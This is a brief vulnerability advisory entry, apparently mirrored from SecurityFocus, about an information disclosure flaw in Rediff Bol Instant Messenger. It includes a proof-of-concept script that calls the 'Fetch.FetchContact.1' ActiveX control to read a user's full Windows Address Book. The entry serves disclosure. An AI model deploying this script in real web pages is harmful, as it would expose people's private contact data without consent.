8 lines
No EOL
368 B
Text
8 lines
No EOL
368 B
Text
source: https://www.securityfocus.com/bid/14740/info
|
|
|
|
Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book.
|
|
|
|
[script]
|
|
var Obj = new ActiveXObject("Fetch.FetchContact.1");
|
|
alert(Obj.FullAddressBook(0,"","",""));
|
|
[/script] |